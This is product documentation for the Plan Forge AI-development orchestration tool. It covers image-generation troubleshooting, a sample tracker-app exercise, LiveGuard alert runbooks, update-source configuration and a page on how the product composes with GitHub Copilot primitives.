The image tool generates an image, bytes land in the MCP tool result
If raw base64 is included in the response, Claude adds it to conversation history
Claude's API validates MIME types on every subsequent request (the entire message history is re-sent)
Once a mismatched image enters the history, every future message fails with the same 400 error
The session cannot be recovered, you must start a new conversation

This only affects conversations where raw base64 image data enters the message history. The current Plan Forge MCP implementation returns text-only responses (file path + metadata), so this crash should not occur during normal use.

Current Mitigations

The generateImage() function in orchestrator.mjs has four layers of defense:

Defense	What It Does	Code Location
Magic byte detection	Inspects first bytes to determine actual format (JPEG = `0xFF 0xD8 0xFF`, PNG = `0x89 0x50 0x4E 0x47`)	`detectImageFormat()`
Format conversion	Uses `sharp` to convert to requested format when actual ≠ requested	`convertImageFormat()`
Text-only MCP response	Tool returns `type: "text"` with JSON payload (file path, metadata), never raw base64	`server.mjs` handler
Truncated base64	Only first 100 chars of base64 included for diagnostics, never full bytes	`generateImage()` return

Safe Workflows

For Chapter Art and Illustrations

Always specify outputPath, image saves to disk, not returned inline
Prefer .jpg extension, matches what Grok actually returns (no conversion needed)
If you need PNG, ensure sharp is installed: cd pforge-mcp && npm install sharp
Never generate images in a long-running session, use the REST API or a standalone script
Batch image generation, generate all art in one dedicated session, separate from writing

Standalone Script (Recommended)

REST API (server must be running)

curl -X POST http://localhost:3100/api/image/generate \
  -H "Content-Type: application/json" \
  -d '{
    "prompt": "dark fantasy forge workshop panoramic, amber firelight",
    "outputPath": "docs/manual/assets/chapter-heroes/ch1-hero.webp"
  }'

One-shot Node script (no server needed)

node -e "
  import('./pforge-mcp/orchestrator.mjs').then(m =>
    m.generateImage('dark fantasy forge workshop, amber firelight', {
      outputPath: 'docs/manual/assets/chapter-heroes/ch1-hero.webp',
      model: 'grok-imagine-image'
    }).then(r => console.log(JSON.stringify(r, null, 2)))
  )
"

Pipeline Test Results

Tested 2026-04-07:

Test	Result	Details
JPG direct (`.jpg` output)	✓ PASS	Grok returns JPEG, saved as `.jpg`, no conversion. 41 KB.
PNG conversion (`.png` output)	✓ PASS	Grok returns JPEG, `sharp` converts to PNG, 312 KB.
MIME detection	✓ PASS	`detectImageFormat()` correctly identified JPEG bytes.
MCP tool response	✓ SAFE	Returns text-only JSON, never raw base64.
Session recovery	⚠ MITIGATED	Crash only occurs if raw base64 with wrong MIME enters history. Current code prevents this.

If a Session Crashes

Start a new conversation, the current session cannot be recovered
Don't retry the same tool call in the new session, it will produce the same crash if the root cause persists
Use the REST API instead of the MCP tool for the image generation
Check sharp: run cd pforge-mcp && npm ls sharp, if not installed, format conversion won't work and the extension gets corrected to .jpg instead

Best practice: Use .jpg for all generated images. It matches Grok's native output format, no conversion, no risk, fastest save.

📄 Source: pforge-mcp/orchestrator.mjs, detectImageFormat(), convertImageFormat(), generateImage()

Forge workbench with glowing tracker blueprints, anvil with golden checklist, and tech stack mascots floating as ember particles

Appendix E

Sample Project — Build a Tracker App

Pick your stack. Build a real app. Learn Plan Forge by using it.

The Tracker App

A task tracker with users, projects, tasks, statuses, and comments. Simple enough to build in an afternoon, rich enough to exercise every Plan Forge feature. You'll run the full pipeline (Specify → Harden → Execute → Review → Ship) five times, once per phase, and learn a different manual chapter with each one.

Tracker App, Data Model

Users

id, email, name, password_hash, role, created_at

Projects

id, name, description, owner_id, status, created_at

Tasks

id, project_id, title, description, status, assignee_id, priority, due_date

Comments

id, task_id, author_id, body, created_at

Pick Your Preset

The specs below are framework-agnostic. Plan Forge generates stack-specific plans based on your preset. Pick the one you want to learn:

dotnet

typescript

python

java

go

swift

rust

php

any stack

Getting Started

Terminal

mkdir tracker-app && cd tracker-app
git init

# Pick your preset (replace  with dotnet, typescript, python, etc.)
.\setup.ps1 -Preset <your-stack>

# Verify
.\pforge.ps1 smith

Phase Roadmap

Phase 1

Bootstrap + Health

→

Phase 2

Users + Auth

→

Phase 3

Projects + Tasks

→

Phase 4

Comments + Events

→

Phase 5

Dashboard + Reports

What You'll Practice

Phase	What You Build	Manual Chapters Practiced
1	Project scaffold + `GET /health`	Ch 3 (Installation), Ch 4 (Your First Plan)
2	User model + JWT auth + roles	Ch 5 (Writing Plans), Ch 9 (auto-loading auth + security instructions)
3	Project & Task CRUD + tests	Ch 6 (Dashboard monitoring), Ch 7 (CLI: sweep, diff, analyze)
4	Comments + event publishing	Ch 13 (quorum mode, parallel slices, model routing)
5	Dashboard views + caching	Ch 8 (custom instructions for reporting domain)

Phase 1 — Bootstrap + Health Endpoint

This is the same exercise from Chapter 6, but now in context of a larger project. Paste this into the specifier agent:

Paste into Step 0 (Specifier)

Feature: health-endpoint

Problem: The Tracker app needs a health check endpoint so load balancers
and monitoring tools can verify the service is running.

Scenarios: GET /health every 30 seconds. Returns 200 OK with
{"status": "healthy", "version": "1.0.0"}.

Acceptance Criteria:
- GET /health returns 200 with JSON body
- Response time under 50ms
- No authentication required
- If database unreachable: 503 {"status": "degraded", "reason": "database"}

Out of Scope: Deep dependency checks, metrics endpoint, custom health UI.

Run the full pipeline: Step 0 → Step 1 → Step 2 → Step 3 → Step 4 → Step 5 → Step 6. When done, pforge phase-status docs/plans/Phase-1-*.md complete.

Phase 2 — Users + Authentication

Paste into Step 0 (Specifier)

Feature: user-authentication

Problem: The Tracker app needs user accounts with login, registration,
and role-based access control (admin, member).

MUST Criteria:
- User registration with email + password (hashed, never plaintext)
- Login returns JWT token (access + refresh)
- Role-based authorization: admin can manage all projects, member sees own
- Protected endpoints return 401 without valid token, 403 without required role
- Password reset flow (token-based)

SHOULD Criteria:
- Rate limiting on login endpoint (5 attempts per minute)
- Audit log for authentication events

Out of Scope: OAuth/social login, MFA, user profile editing.

Watch for auto-loading: When the executor creates auth files, notice that auth.instructions.md and security.instructions.md load automatically. This is the applyTo mechanism from Chapter 2 in action.

Phase 3 — Projects + Tasks CRUD

Paste into Step 0 (Specifier)

Feature: project-task-management

Problem: Users need to create projects and manage tasks within them.

MUST Criteria:
- CRUD for Projects (create, read, update, delete)
- CRUD for Tasks within a project
- Task fields: title, description, status (todo/in-progress/done), priority (low/medium/high), assignee, due date
- Only project owner or admin can delete a project
- List tasks with filtering by status, assignee, priority
- Pagination on list endpoints (default 20 per page)
- 90%+ test coverage on service layer

SHOULD Criteria:
- Task sorting by priority, due date, created date
- Bulk status update for selected tasks

Out of Scope: File attachments, subtasks, task templates, Kanban board UI.

Try the dashboard: Start the MCP server (node pforge-mcp/server.mjs) and watch localhost:3100/dashboard during execution. You'll see slices progress in real-time, this is Chapter 7 in action.

Phase 4 — Comments + Event Publishing

Paste into Step 0 (Specifier)

Feature: comments-and-events

Problem: Users need to discuss tasks via comments, and the system needs
an event bus for audit/notification purposes.

MUST Criteria:
- Add, edit, delete comments on tasks
- Only comment author or admin can edit/delete
- Event publishing: task-created, task-updated, task-status-changed, comment-added
- Event consumers: update task activity log, update project last-modified timestamp
- Comments include created_at, updated_at timestamps

SHOULD Criteria:
- @mention support in comments (notify mentioned user)
- Activity feed endpoint: recent events across user's projects

Out of Scope: Real-time WebSocket push to clients, email notifications, rich text.

Try advanced execution: This phase has independent slices (comments vs events). Add [P] tags to the hardened plan for parallel execution. Try --quorum=auto to see multi-model consensus on complex slices. See Chapter 14.

Phase 5 — Dashboard + Reports

Paste into Step 0 (Specifier)

Feature: dashboard-and-reporting

Problem: Users need an overview of their projects with status summaries,
task distribution, and activity trends.

MUST Criteria:
- Dashboard endpoint: project count, task count by status, overdue tasks
- Per-project summary: task breakdown, recent activity, completion percentage
- Reporting endpoint: tasks completed this week/month, average time to close
- Cache dashboard data (invalidate on task/project changes)

SHOULD Criteria:
- Configurable date ranges on reports
- Export report as JSON

Out of Scope: Charts/graphs (API only), PDF export, scheduled reports.

Write a custom instruction: Create .github/instructions/reporting.instructions.md with rules for your reporting domain (cache invalidation patterns, aggregation query patterns). This is Chapter 9 in action.

Stretch Goals

Finished all 5 phases? Try these advanced exercises:

Exercise	What You'll Learn	Command/Chapter
Add multi-tenancy	Install an extension, see guardrails auto-apply	`pforge ext add saas-multi-tenancy` → Ch 11
Add CI validation	Automate quality gates on PRs	Copy `plan-forge-validate.yml` → Ch 13
Quorum analysis	Multi-model consistency scoring	`pforge analyze --quorum docs/plans/Phase-3-*.md`
Generate a Project Profile	Tighten guardrails based on your standards	Attach `project-profile.prompt.md` → Ch 8
Define Project Principles	Declare non-negotiable commitments	Attach `project-principles.prompt.md` → Ch 8
Run with a different AI tool	Test multi-agent setup	`.\setup.ps1 -Agent claude` → Ch 12
Diagnose a bug	Multi-model bug investigation	`pforge diagnose src/services/TaskService.*` → Ch 7

The specs are deliberately high-level. You use Plan Forge (specifier → hardener → executor) to flesh them out. That's the exercise, learning the pipeline by making it do the heavy lifting.

📄 Based on the Tracker sample app in plan-forge-testbed. See also: greenfield-todo-api walkthrough on GitHub

Open spell book on a forge workbench with glowing amber pages, red and green runes floating above, anvil beside it

Appendix F

LiveGuard Alert Runbooks

The guardian fired. Here's exactly what to do next.

Runbooks for all 6 alert types. Severity matrix, per-alert response procedures, escalation paths, and the fix-proposal workflow. Auto-chaining and composite health checks are available.

Severity Matrix

Every LiveGuard alert carries one of four severity levels. The matrix below defines response SLA and escalation path. Full runbooks per alert type follow.

Severity	Response SLA	Notify	Dashboard Badge
Critical	Immediate, within 1 hour	On-call + team lead	Red badge on Triage tab
High	Same business day	On-call engineer	Amber badge on Triage tab
Medium	Next sprint	Team chat	Yellow dot on relevant tab
Low	Backlog	—	No badge

Per-Alert Runbooks

Drift Spike — Architecture Diverged from Plan Baseline

Source: forge_drift_report | Typical severity: Medium–High

Assess: Run pforge drift to get the current score and delta. If delta > 10 points in one session, treat as High.
Identify: Check the violations[] in the output, each violation lists the file, rule, and instruction file it violates.
Root cause: Was this an intentional architectural change? If yes, update the instruction file or plan baseline. If no, the code drifted from the plan.
Fix: For unintentional drift, refactor to match the plan. For intentional changes, update the plan's Scope Contract to reflect the new architecture.
Verify: Re-run pforge drift, score should recover to within 5 points of the previous baseline.

Secret Found — High-Entropy String in Committed Diff

Source: forge_secret_scan | Typical severity: Critical

Do not push: If the commit hasn't been pushed, amend it to remove the secret. git reset HEAD~1, remove the credential, re-commit.
Rotate immediately: If the commit has been pushed, the credential is compromised. Rotate it in the external provider (API dashboard, vault, etc.) before any other action.
Remove from history: Use git filter-repo or BFG Repo-Cleaner to purge the secret from git history. A simple amendment is not sufficient, the old commit object still exists.
Move to secrets manager: Store the new credential in .forge/secrets.json (gitignored), an environment variable, or your cloud vault. Never in source code.
Verify: Re-run pforge secret-scan, output should show clean: true.

Time-critical: Secret findings should be treated as Critical regardless of the entropy score. Automated rotation is out of scope for LiveGuard, the tool detects and alerts; humans rotate.

Env Diff Gap — Required Key Missing from Environment File

Source: forge_env_diff | Typical severity: Medium–High

Review gaps: Run pforge env-diff to see which keys are missing and in which files.
Categorize: Is the key required for the target environment? Some keys (e.g., DEBUG=true) are intentionally absent from production.
Add missing keys: For required keys, add them to the target .env.* file with the appropriate value for that environment.
Document exceptions: If a key is intentionally absent, add a comment in the baseline .env file: # NOT_IN_PROD: DEBUG.
Verify: Re-run pforge env-diff, output should show clean: true or only expected gaps.

Regression Gate Failure — Previously Passing Gate Now Fails

Source: forge_regression_guard | Typical severity: High

Identify: Run pforge regression-guard to see which gates failed and their error output.
Bisect: Use git log to find which commit broke the gate. The gate command output usually points at the exact file.
Fix or update: If the code broke a valid gate, fix the code. If the gate is outdated (the feature was intentionally changed), update the gate command in the plan file.
Verify: Re-run pforge regression-guard --plan <affected-plan>, all gates should pass.

Dependency Vulnerability — New CVE in a Watched Package

Source: forge_dep_watch | Typical severity: Medium–Critical (depends on CVE severity)

Assess: Run pforge dep-watch to see new vulnerabilities with their CVE IDs and severity.
Check exploitability: Not all CVEs are exploitable in your context. Check if the vulnerable code path is reachable in your app.
Update: npm update <package> or pin to a patched version. For transitive dependencies, use npm audit fix.
If no patch exists: Evaluate alternatives, add a compensating control, or document the accepted risk with a timeline for re-evaluation.
Verify: Re-run pforge dep-watch, the vulnerability should move from newVulnerabilities to resolvedVulnerabilities.

Incident MTTR Exceeded — Time-to-Resolve Beyond Threshold

Source: forge_alert_triage (via MTTR calculation) | Typical severity: High

Review: Run pforge triage to see ranked open incidents and drift violations with their MTTR.
Escalate: If the incident has been open beyond the SLA for its severity level (see severity matrix above), escalate to the next tier defined in onCall.escalation.
Root cause: Is the incident blocked on external factors? If so, document the blocker in the incident description.
Close: Once resolved, update the incident status. MTTR is automatically calculated from capture time to close time.

Fix Proposal Workflow

When a LiveGuard tool fires a failure (regression, drift, incident, or secret found), forge_fix_proposal generates a scoped 1-2 slice fix plan for human review. This is the detect → propose → approve → fix loop.

Trigger: Run pforge fix-proposal --source regression (or drift/incident/secret) after the alert fires.
Review the plan: Open docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan contains the failing command, affected files, and a template fix slice with  markers for you to fill in.
Fill in the fix: Complete the TODO markers in the fix slice. For secret findings, the template directs you to remove the credential from the diff and rotate it externally before proceeding.
Execute on a branch: pforge run-plan --assisted docs/plans/auto/LIVEGUARD-FIX-<incidentId>.md. The plan targets a dedicated branch, never master.
Verify: The second slice re-runs the exact commands that originally failed. Green gate = fix confirmed.
Promote or close: Merge the branch if the fix holds. Close the proposal by updating its status in .forge/fix-proposals.json. Auto-generated plans in docs/plans/auto/ are gitignored, promote manually to docs/plans/ if you want to keep it in version history.

Loop cap: forge_fix_proposal generates at most one proposal per incidentId. If the first proposal doesn’t resolve the issue, address it manually, the tool will return status: "needs-human-intervention" on the second call.

Related: See Chapter 17 — LiveGuard Tools Reference for the exact CLI commands to run during each runbook step. See Chapter 18 to navigate to the alert from the dashboard.

Stone forge crossroads at twilight with two diverging glowing amber paths, GitHub upstream vs sibling clone

Appendix G

Update Source Modes

Where pforge update pulls template bytes from, and why the default changed in v2.56.0.

The Problem

Before v2.56.0, pforge update had a single hard-coded source-selection rule: use the sibling clone at ../plan-forge if one existed, otherwise fail and ask for --from-github. This was optimized for contributors on their primary machine, the sibling is always on master, which is always freshly built, so contributors dogfood every change.

The trouble showed up on secondary machines: users who happened to have cloned the Plan Forge repo earlier (say, to browse the source) would later run pforge update on an unrelated project and get surprise -dev bytes from a stale master checkout. The second PC behaved differently from the first, for reasons that weren't obvious.

The Three Modes

.forge.json now accepts an updateSource key with three values. The default, auto, picks the right thing for most people; the other two give you explicit control.

Mode	Behavior	When to use
`auto` (default)	Picks the newer of your sibling clone and the latest GitHub tag. If the sibling is on a `-dev` build, GitHub wins.	Users on any machine. Teams. Anyone who isn't actively contributing patches back to Plan Forge.
`github-tags`	Always downloads the latest tagged release from GitHub. Ignores any sibling clone even if present.	Teams that want reproducible, audited updates. CI pipelines. Pinned-dependency shops.
`local-sibling`	Always uses the sibling clone at `../plan-forge`. Errors if one is missing.	Contributors working on Plan Forge itself. You run `git pull` in the sibling to pick up changes.

Auto mode in detail. It calls the GitHub Releases API (cached 24h in .forge/update-check.json) to resolve the latest tag, reads the sibling's VERSION file, and compares the two with semver precedence, any -dev pre-release loses to a clean tag. If the sibling wins or there's no network, it uses the sibling. If GitHub wins or there's no sibling, it uses the tag.

How to Change Your Mode

Three ways, all equivalent, they all write .forge.json.

1. CLI

Terminal

# Read current value
pforge config get update-source

# Set it
pforge config set update-source github-tags
pforge config set update-source local-sibling
pforge config set update-source auto

# List all settable keys
pforge config list

2. Dashboard

Open the dashboard (localhost:3100/dashboard), switch to the Config tab, find the Update Source select. Your choice saves immediately, no Save button required. The hint text below the dropdown reminds you what each mode does.

3. Hand-edit `.forge.json`

.forge.json

{
  "preset": "dotnet",
  "templateVersion": "2.56.0",
  "updateSource": "auto"
}

FAQ

Will `auto` ever install `-dev` bytes over my clean release?

No. The -dev refusal guard from v2.53.2 is still in place: if the selected source is a -dev build and your current install is clean, the update aborts with a helpful message. auto mode short-circuits this earlier by preferring the tagged release. If you explicitly set local-sibling and the sibling is -dev, you'll hit the refusal unless you pass --allow-dev.

What happens offline in `auto` mode?

If the GitHub tag lookup fails (timeout, no network, rate-limit), auto falls back to the sibling if one exists. If there's no sibling and no network, you'll get the same error you would have gotten pre-v2.56.0, run --from-github when you're back online, or set a sibling clone.

`pforge self-update` — does this affect it?

No. self-update is a separate command that always pulls from GitHub releases (it's designed to heal a corrupted install). updateSource only controls pforge update.

Should CI pipelines set a mode?

Yes, set updateSource to github-tags in your CI's .forge.json. This guarantees every CI run pulls from a specific tagged release and ignores whatever happens to be checked out in adjacent directories.

Do I need to migrate my existing `.forge.json`?

No. Projects with no updateSource key default to auto, which is the recommended behavior anyway. The change is additive.

GitHub Stack Alignment

The thesis: GitHub ships the agent runtime + integration standards + customization primitives + engagement metrics. Everything above the runtime is the ecosystem's lane. Plan Forge is built for that lane.

Who this page is for: Engineering leaders, platform engineers, and architects evaluating a complete AI-SDLC stack, whether you've already standardized on GitHub Copilot or you're shopping the category fresh.

Companion to: What is Plan Forge? · How it works · Appendix I — Plan Forge on the GitHub Stack (the surface-by-surface technical reference).

Why this combination is the only one in the category

Plan Forge + GitHub Copilot ships four capabilities no other AI-SDLC platform on the market combines today:

Three-tier memory so context quality compounds across teams instead of being a per-repo lottery
Multi-model quorum eval, Claude + GPT + Gemini score the same slice independently, 0–100 LLM-as-judge consensus
Audit Loop, scan-triage-fix loop for AI-generated drift, defaulting off, hard-blocked in production at the schema level
Watcher, a second IDE session that tails any in-flight run, read-only by schema (literally cannot write to the target)

In a hurry? Read the next three sections and stop: What you get · The picture · The four pillars. Then jump to Try it — on your own. Architects: the lower half of the page is the supporting context.

What you get — the outcomes

Six numbers every AI-SDLC programme is shopping for. Plan Forge surfaces all six on the live dashboard out of the box, no warehouse project, no BI build, no glue code.

AI-PR %

share of merged PRs touched by an agent

% code by AI

bytes-changed-by-agent vs human, per slice

Pass-rate / phase

first-pass success: design / code / review / test

RCA MTTR

incident-fired → fix-validated, hours

Drift score

codebase-vs-architecture, scored per commit

$ / merged PR

token spend reconciled against shipped value

The leading-indicator metric leadership usually asks for last, human-intervention frequency, is also captured automatically. Every time a human took over from an agent is recorded; trend lines show whether the harness is getting better or worse. See Health DNA for the full metric catalogue, or the quick reference for the complete dashboard surface.

The picture — harness (orchestration) on substrate (primitives)

Read top-down: outcomes you get, the harness (the orchestration layer Plan Forge provides), the substrate (GitHub Copilot's primitives) it sits on, and the GitHub platform foundation everything inherits.

AI SDLC Stack

End to end — harness on substrate

The first complete AI software-development lifecycle stack: GitHub Copilot below, Plan Forge above, your outcomes on top.

Read top-down: the green band is what you ship. The amber band is Plan Forge, the harness (orchestration) that produces those outcomes. The blue band is the GitHub Copilot substrate (primitives) the harness sits on. The slate band is the GitHub platform foundation everything inherits.

The four pillars — what the harness actually does

Plan Forge organises into four pillars. Each card is plain English; click What's inside for the component-level detail and the manual chapter that goes deep.

1 · Orchestration

Plans become slices, slices become work, work becomes audited PRs.

An idea is interviewed into a hardened plan. The plan is split into safe-sized slices. Each slice runs in its own worktree, gets reviewed by 20 specialised reviewer agents, and only ships if its validation gate passes. The platform learns from every run and builds new skills automatically.

What's inside & where to read more

Crucible interview funnel · Tempering quality scorer · Inner Loop competitive worktrees · Forge-Master chat-first router · 20 read-only reviewer agents · 14 slash-command skills · Reflexion retry · auto-skill library · lifecycle hooks (pre/post slice).

→ Crucible · Inner Loop · Forge-Master · Instructions & Agents · Agent Factory recipe · Multi-agent

… and more. Full surface area in the quick reference.

2 · Memory

Context quality compounds across teams instead of being a per-repo lottery.

Three tiers: a live event stream you can watch right now, a deterministic file trail every team can audit and grep, and an optional semantic store that lets one team's lessons surface automatically when another team hits a similar problem. Lessons learned in service A become defaults in service B without anyone filing a knowledge-base article.

What's inside & where to read more

L1 Hub, live WebSocket events · L2 Files, .forge/ append-only audit trail · L3 OpenBrain, pgvector semantic store · cross-team federation (read-only) · bridge-and-flush durability · search_thoughts · brain_recall.

→ Memory architecture

… and more. Full surface area in the quick reference.

3 · Eval & Drift

Quality, not just adoption, the half the GitHub Metrics API doesn't cover.

Three frontier models score the same change independently and a reviewer model produces a 0–100 consensus number. Drift from your architecture is measured per commit. RCA outputs become PR proposals, not tickets. Cost is previewed before the run, not after the bill.

What's inside & where to read more

Quorum (Claude + GPT + Gemini) · 0–100 LLM-as-judge consensus · forge_drift_report per-commit · forge_health_trend with trajectories · forge_estimate_quorum (cancellable cost preview) · forge_fix_proposal (RCA → PR) · % code by AI · MTTR · drift score.

→ Health DNA · Self-deterministic loop · Dashboard

… and more. Full surface area in the quick reference.

4 · Governance & Self-Repair

Audit-grade by default. Approve from your phone. The platform reports its own bugs upstream.

Hooks fire before every deploy and after every slice. Bugs deduplicate themselves. A separate read-only watcher tails any in-flight run. When the harness itself misbehaves, it files a structured bug report against its own upstream, you're never holding the bag alone on a platform issue.

What's inside & where to read more

LiveGuard hooks (preDeploy / postSlice / preAgentHandoff) · Bug Registry with fingerprint dedupe · Incident Capture + MTTR · Audit Loop (scan → triage → spawn-worker fix) · forge_runbook + Deploy Journal · Remote Bridge (Slack / Teams / PagerDuty / Discord / Telegram) · Watcher (read-only by schema) · forge_meta_bug_file self-repair.

→ What is LiveGuard · LiveGuard dashboard · Audit loop · Bug registry · Watcher · Remote bridge

… and more. Full surface area in the quick reference.

What we deliberately don't try to do

Discipline matters. A platform that tries to own everything ends up owning nothing well. Plan Forge does not:

Replicate the Copilot Metrics API, we add quality metrics; we don't re-implement adoption metrics
Embed or fork the Copilot Cloud Agent runtime, we dispatch to it
Compete with github/github-mcp-server, we use it; we ship our own MCP server only for orchestration concerns
Reinvent AGENTS.md, Skills, or MCP, we adopt the open standards; we contribute back when we learn something

If GitHub ships a feature that subsumes a Plan Forge capability, the right answer is to delete the Plan Forge code and use GitHub's. We're explicit about that in the project README.

Try it — on your own, on your own time

Plan Forge is MIT-licensed and open source. There's no sales call, no pilot agreement, no license to procure. If you already have GitHub Copilot and GHAS, you have everything you need to evaluate the full stack against your own repos this afternoon.

Install in one repo. Clone github.com/srnichols/plan-forge, run setup.ps1 -Agent claude (or --agent codex / --agent cursor / --agent copilot). Generate Project Principles + initial instruction files via forge_run_skill /onboarding. Wire action.yml into GitHub Actions for PR-time gates. Walk-through: install + first plan.
Run a real task end-to-end. Take one in-flight ticket through the full pipeline: Crucible → plan → execution → reviewer agents → Bug Registry if you hit one. The trajectory is captured automatically; you can replay it from the dashboard.
Add a second repo, turn on what makes sense for you. Cloud Agent dispatch (--worker copilot-coding-agent) for async bulk work. LiveGuard hooks if you have a deploy pipeline. The Audit Loop if you want a Coverity-style scan over an existing module. Everything is opt-in.
Read the dashboard. The six KPIs from "What you get" populate themselves as you run plans. Compare to your baseline. Decide whether to roll wider on your own schedule.

Cost to evaluate: zero beyond your existing Copilot + GHAS subscription. No new licences, no headcount, no infrastructure, no procurement cycle. Bring your own GHCP partner relationship if you have one, Plan Forge composes on top of whatever Copilot Enterprise tier and support arrangement you already use.

Stuck? File an issue at github.com/srnichols/plan-forge/issues, or open a discussion. Plan Forge ships forge_meta_bug_file precisely so problems with the platform get reported back automatically, you're not on your own.

Architect appendix · supporting context for technical readers

The signal: GitHub said this out loud in April 2026

On April 2, 2026, GitHub shipped the Copilot SDK in public preview. The release notes describe it as "the same production-tested agent runtime that powers GitHub Copilot cloud agent and Copilot CLI" exposed for application developers to embed.

The implication is unmistakable:

GitHub views agent orchestration as something built on top of their primitives, not inside them.

This page documents how Plan Forge composes with the primitives GitHub explicitly leaves to the ecosystem.

What GitHub ships (the substrate — primitives)

Primitive	What it is	Status (May 2026)
Copilot Cloud Agent (formerly Coding Agent)	Ephemeral Actions-powered runner. Single repo / single branch / single PR per task. Three modes: research-only, plan-only, branch-only	GA
AGENTS.md	Open standard for agent context files	Stewarded by Agentic AI Foundation under the Linux Foundation. 60k+ repos use it. GitHub adopts; does not own
Agent Skills	Open standard for agent procedural knowledge	Repo `agentskills/agentskills`, Apache 2.0, maintained by Anthropic. GitHub adopts
Model Context Protocol (MCP)	Open standard for agent-to-tool integration	Linux Foundation project. Maintained by Anthropic et al. GitHub ships `github/github-mcp-server` (29.5k stars, MIT) as the reference implementation
`.github/instructions/`	GitHub-native repo customization	GA. Plan Forge ships ~18 instruction files
`.github/copilot-instructions.md`	Repo-wide Copilot context	GA
`.github/agents/`	Custom agent personas	GA on github.com (preview in JetBrains/Eclipse/Xcode)
`.github/hooks/`	Lifecycle hooks (preToolUse, postToolUse, sessionStart, etc.)	GA
`.github/skills/`	Repo-scoped skill definitions	GA
GitHub Actions	CI/CD runtime that powers Cloud Agent	GA
GitHub Advanced Security (GHAS)	Code scanning, secret scanning, Dependabot	GA
Copilot Spaces	Curated context bundles for chat	GA (chat-side; not yet a Cloud Agent execution context)
Copilot Metrics API	Adoption + flow metrics (active users, PR throughput, time-to-merge)	GA
Copilot SDK	Embed the Cloud Agent runtime in your own app	Public preview, April 2, 2026
Custom properties	Org-level governance primitive	GA
Org runner controls + firewall	Cloud Agent runtime governance	GA (April 2026)

This is a strong, coherent substrate. It is also explicitly just the substrate.

What GitHub deliberately leaves to the ecosystem (the Plan Forge lane)

These are the surfaces GitHub does not ship and shows no sign of shipping, direct evidence from GitHub's own docs and roadmap:

Gap	Evidence
Hardened plan as versioned artifact with scope contract, slices, validation gates, drift detection	Plan-mode is session-scoped one-shot; no plan file format, no scope contract, no slice persistence
Cross-repo / multi-service orchestration	Explicit single-repo limitation: "Copilot can only make changes in the repository specified when you start a task. Copilot cannot make changes across multiple repositories in one run."
Multi-model quorum / consensus per task	No built-in mechanism. Single model per session
Plan execution harness with per-slice gates and resume-from semantics	`copilot-setup-steps.yml` is one pre-flight hook; nothing slice-aware
Semantic eval harness (test pass rate, regression rate, plan-adherence)	Metrics API explicitly does not measure quality, only adoption + flow
Cost prediction per task / per plan before execution	Only post-hoc Actions + premium-request totals
Live programmatic watch of an in-flight agent from external tools	Session UI is in-product only; no public stream
Cross-org / cross-team fleet console with queue, capacity, SLA visibility	Only per-issue / per-project session UI
Pre-merge plan-adherence gates	No first-party concept of "this PR drifted from the approved plan"
Agent skills / instructions sync across N repos	Up to consumer (`.github-private` is the only template mechanism)
Multi-tenant cost budgets and prioritization	Not in product
A/B comparison of custom agents or models for the same task class	Not in product
Cross-team / cross-project semantic memory so lessons compound across pilots	Copilot Spaces is chat-side and repo-scoped; no semantic recall across teams or sessions
Closed-loop RCA → fix-proposal → validate-fix pipeline	`@copilot` on issues + GHAS Autofix are open-loop point features; no native bug registry, no multi-model RCA, no fix validation cycle
Coverity-style scan → triage → spawn-worker → fix loop for AI-generated drift	GHAS scans + Autofix on findings only; nothing that spawns a worker per finding and iterates to convergence
Deploy-aware lifecycle hooks (preDeploy / postSlice / preAgentHandoff) with severity gates	Existing hooks (preToolUse / postToolUse / sessionStart) are session-scoped; nothing fires before deploys with severity blocking
Idea → hardened-plan interview funnel with lane-scoped Q&A	Plan-mode is single-shot session output; no interview funnel, no lane classification, no progressive refinement
Pre-flight plan-quality scorer (scope-contract clarity, slice sizing, gate strength, forbidden-actions)	Nothing in product scores plan quality before execution
Specialized reviewer agent fleet (20+ read-only personas: arch / security / db / perf / a11y / multi-tenancy / CI-CD / compliance / dependency / observability)	Copilot Code Review is singular and chat-prompted; no first-party persona library
Remote-bridge approval flows with resume-on-approve (Slack / Teams / PagerDuty / Telegram / Discord)	GitHub notifications fire one-way; no inline-approve → resume-paused-slice flow
Deploy Journal + auto-generated runbook per plan	No first-party concept of "audit record per deploy" or "runbook from this plan"
… and more. The full capability index lives in the quick reference and the manual book index.

GitHub's positioning is consistent: wrap your tool/data source as an MCP server, layer your customization via the open file standards (AGENTS.md, Skills, instructions), and build your orchestration on top of the SDK. That is exactly the Plan Forge architecture.

How Plan Forge composes with each GitHub primitive

A 16-row reference for architects mapping each GitHub-native primitive to the Plan Forge surface that consumes it. Click to expand.

Per-primitive composition table (16 rows)

GitHub primitive	How Plan Forge consumes it	Where in Plan Forge
Copilot Cloud Agent	Plan Forge dispatches plan slices to CCA via `gh issue create --assignee @copilot`. Trajectories captured to `.forge/trajectories/<plan-slug>.jsonl`	`pforge-mcp/orchestrator.mjs` (`--worker copilot-coding-agent` mode)
AGENTS.md	Plan Forge generates and maintains AGENTS.md alongside `.github/copilot-instructions.md` so any AGENTS.md-aware agent (Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf) consumes Plan Forge context	`pforge-mcp/server.mjs` setup phase
`.github/instructions/`	Plan Forge ships ~18 instruction files covering architecture, security, testing, database, API, auth, error handling, deployment, performance, observability, version, status reporting, context fuel, self-repair, plan hardening	`templates/.github/instructions/`
`.github/copilot-instructions.md`	Plan Forge generates the project-scoped Copilot instructions during `setup.ps1` / `setup.sh`	`setup.ps1`, `setup.sh`
`.github/agents/`	Plan Forge ships 20 custom agent personas (architecture, database, security, deploy, performance, test-runner, API contracts, accessibility, multi-tenancy, CI/CD, observability, dependency, compliance, plus 6 pipeline agents and an audit classifier)	`templates/.github/agents/`
`.github/hooks/`	Plan Forge ships its own lifecycle hooks: `PreDeploy`, `PreCommit`, `PreAgentHandoff`, `PostSlice`, plus `plan-forge.json` hook configuration. Distinct from Claude Code's hook names.	`templates/.github/hooks/`
`.github/skills/`	Plan Forge ships 11 skills as `/` slash-commands: database-migration, staging-deploy, test-sweep, dependency-audit, security-audit, code-review, release-notes, api-doc-gen, onboarding, health-check, forge-execute, audit-loop, plus pipeline skills	`templates/.github/skills/`
MCP	Plan Forge ships its own MCP server (`pforge-mcp`) with 102 tools covering planning, execution, eval, observability, cost, memory, search, timeline, notifications. Auto-generates `.vscode/mcp.json`	`pforge-mcp/server.mjs`, `pforge-mcp/tools.json`
`github/github-mcp-server`	Plan Forge documents this as the canonical GitHub-side MCP integration. Plan Forge agents call it via the MCP plumbing they already speak	docs reference, `.vscode/mcp.json` example
